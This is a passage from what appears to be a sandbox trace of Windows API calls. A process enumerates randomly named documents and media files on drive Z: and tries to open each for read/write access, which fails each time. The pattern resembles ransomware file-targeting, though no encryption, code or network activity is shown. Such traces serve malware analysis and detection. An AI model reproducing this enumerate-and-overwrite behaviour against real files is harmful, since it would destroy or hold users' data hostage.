ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x796b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YizWtOq9sqniAiG.pptx", cAlternateFileName="")) returned 1 [0185.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.983] PathFindExtensionW (pszPath="Z:\\YizWtOq9sqniAiG.pptx") returned=".pptx" [0185.987] CreateFileW (lpFileName="Z:\\YizWtOq9sqniAiG.pptx" (normalized: "z:\\yizwtoq9sqniaig.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.988] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe324, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfTEIxbdxeH16.wav", cAlternateFileName="")) returned 1 [0185.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.989] PathFindExtensionW (pszPath="Z:\\SfTEIxbdxeH16.wav") returned=".wav" [0185.994] CreateFileW (lpFileName="Z:\\SfTEIxbdxeH16.wav" (normalized: "z:\\sfteixbdxeh16.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.996] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICn9FymqAtw6QQL.ppt", cAlternateFileName="")) returned 1 [0185.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.996] PathFindExtensionW (pszPath="Z:\\ICn9FymqAtw6QQL.ppt") returned=".ppt" [0186.001] CreateFileW (lpFileName="Z:\\ICn9FymqAtw6QQL.ppt" (normalized: "z:\\icn9fymqatw6qql.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.026] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7c37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ewbUbaNVSvHfRRfQfQLC.xls", cAlternateFileName="")) returned 1 [0186.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.026] PathFindExtensionW (pszPath="Z:\\ewbUbaNVSvHfRRfQfQLC.xls") returned=".xls" [0186.031] CreateFileW (lpFileName="Z:\\ewbUbaNVSvHfRRfQfQLC.xls" (normalized: "z:\\ewbubanvsvhfrrfqfqlc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.033] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6b5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="svuJsC.pdf", cAlternateFileName="")) returned 1 [0186.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.033] PathFindExtensionW (pszPath="Z:\\svuJsC.pdf") returned=".pdf" [0186.039] CreateFileW (lpFileName="Z:\\svuJsC.pdf" (normalized: "z:\\svujsc.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.041] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x124eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gh4zJ.pps", cAlternateFileName="")) returned 1 [0186.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.041] PathFindExtensionW (pszPath="Z:\\gh4zJ.pps") returned=".pps" [0186.046] CreateFileW (lpFileName="Z:\\gh4zJ.pps" (normalized: "z:\\gh4zj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.048] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa869, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qys9GnLkOeS.odt", cAlternateFileName="")) returned 1 [0186.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.048] PathFindExtensionW (pszPath="Z:\\qys9GnLkOeS.odt") returned=".odt" [0186.053] CreateFileW (lpFileName="Z:\\qys9GnLkOeS.odt" (normalized: "z:\\qys9gnlkoes.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.054] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x592c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v4eytQpoJk.swf", cAlternateFileName="")) returned 1 [0186.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.054] PathFindExtensionW (pszPath="Z:\\v4eytQpoJk.swf") returned=".swf" [0186.059] CreateFileW (lpFileName="Z:\\v4eytQpoJk.swf" (normalized: "z:\\v4eytqpojk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26692501, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8f30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="evMqhpDEt7CXv.mp3", cAlternateFileName="")) returned 1 [0186.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.061] PathFindExtensionW (pszPath="Z:\\evMqhpDEt7CXv.mp3") returned=".mp3" [0186.066] CreateFileW (lpFileName="Z:\\evMqhpDEt7CXv.mp3" (normalized: "z:\\evmqhpdet7cxv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.069] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pbnq0tEevfYiPYev3.flv", cAlternateFileName="")) returned 1 [0186.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.069] PathFindExtensionW (pszPath="Z:\\Pbnq0tEevfYiPYev3.flv") returned=".flv" [0186.074] CreateFileW (lpFileName="Z:\\Pbnq0tEevfYiPYev3.flv" (normalized: "z:\\pbnq0teevfyipyev3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.075] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13ae1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ofYpMQKf1RjCMx.wav", cAlternateFileName="")) returned 1 [0186.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.075] PathFindExtensionW (pszPath="Z:\\ofYpMQKf1RjCMx.wav") returned=".wav" [0186.081] CreateFileW (lpFileName="Z:\\ofYpMQKf1RjCMx.wav" (normalized: "z:\\ofypmqkf1rjcmx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.083] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa9e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L1fyabptENWoGXu.rtf", cAlternateFileName="")) returned 1 [0186.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.083] PathFindExtensionW (pszPath="Z:\\L1fyabptENWoGXu.rtf") returned=".rtf" [0186.088] CreateFileW (lpFileName="Z:\\L1fyabptENWoGXu.rtf" (normalized: "z:\\l1fyabptenwogxu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.089] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12529, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hoPVmBvF77.odt", cAlternateFileName="")) returned 1 [0186.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.089] PathFindExtensionW (pszPath="Z:\\hoPVmBvF77.odt") returned=".odt" [0186.095] CreateFileW (lpFileName="Z:\\hoPVmBvF77.odt" (normalized: "z:\\hopvmbvf77.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.098] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbc43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="umVoob.csv", cAlternateFileName="")) returned 1 [0186.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.098] PathFindExtensionW (pszPath="Z:\\umVoob.csv") returned=".csv" [0186.103] CreateFileW (lpFileName="Z:\\umVoob.csv" (normalized: "z:\\umvoob.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.105] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6596, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RyYcx2F2hgV.gif", cAlternateFileName="")) returned 1 [0186.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.105] PathFindExtensionW (pszPath="Z:\\RyYcx2F2hgV.gif") returned=".gif" [0186.110] CreateFileW (lpFileName="Z:\\RyYcx2F2hgV.gif" (normalized: "z:\\ryycx2f2hgv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.112] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd1ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AhwQOJysH9.jpg", cAlternateFileName="")) returned 1 [0186.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.112] PathFindExtensionW (pszPath="Z:\\AhwQOJysH9.jpg") returned=".jpg" [0186.117] CreateFileW (lpFileName="Z:\\AhwQOJysH9.jpg" (normalized: "z:\\ahwqojysh9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.118] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eQwKBctI5AfYjbVKmqeN.ods", cAlternateFileName="")) returned 1 [0186.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.118] PathFindExtensionW (pszPath="Z:\\eQwKBctI5AfYjbVKmqeN.ods") returned=".ods" [0186.124] CreateFileW (lpFileName="Z:\\eQwKBctI5AfYjbVKmqeN.ods" (normalized: "z:\\eqwkbcti5afyjbvkmqen.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.125] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfd50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6R7qq9DkqNA3WVHMTs.doc", cAlternateFileName="")) returned 1 [0186.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.125] PathFindExtensionW (pszPath="Z:\\6R7qq9DkqNA3WVHMTs.doc") returned=".doc" [0186.130] CreateFileW (lpFileName="Z:\\6R7qq9DkqNA3WVHMTs.doc" (normalized: "z:\\6r7qq9dkqna3wvhmts.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.133] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KAk0a7xY4jTir.m4a", cAlternateFileName="")) returned 1 [0186.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.134] PathFindExtensionW (pszPath="Z:\\KAk0a7xY4jTir.m4a") returned=".m4a" [0186.139] CreateFileW (lpFileName="Z:\\KAk0a7xY4jTir.m4a" (normalized: "z:\\kak0a7xy4jtir.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.141] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x92e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5n4Otxttbgfrkyd1Qv.mp3", cAlternateFileName="")) returned 1 [0186.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.141] PathFindExtensionW (pszPath="Z:\\5n4Otxttbgfrkyd1Qv.mp3") returned=".mp3" [0186.146] CreateFileW (lpFileName="Z:\\5n4Otxttbgfrkyd1Qv.mp3" (normalized: "z:\\5n4otxttbgfrkyd1qv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.148] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1361c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZRruaCKjxo6i.ots", cAlternateFileName="")) returned 1 [0186.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.148] PathFindExtensionW (pszPath="Z:\\ZRruaCKjxo6i.ots") returned=".ots" [0186.153] CreateFileW (lpFileName="Z:\\ZRruaCKjxo6i.ots" (normalized: "z:\\zrruackjxo6i.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.155] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x91ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oNmnCAGLhaZCfP.bmp", cAlternateFileName="")) returned 1 [0186.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.155] PathFindExtensionW (pszPath="Z:\\oNmnCAGLhaZCfP.bmp") returned=".bmp" [0186.160] CreateFileW (lpFileName="Z:\\oNmnCAGLhaZCfP.bmp" (normalized: "z:\\onmncaglhazcfp.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.161] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x155ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B2EjwcG.xls", cAlternateFileName="")) returned 1 [0186.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.162] PathFindExtensionW (pszPath="Z:\\B2EjwcG.xls") returned=".xls" [0186.167] CreateFileW (lpFileName="Z:\\B2EjwcG.xls" (normalized: "z:\\b2ejwcg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 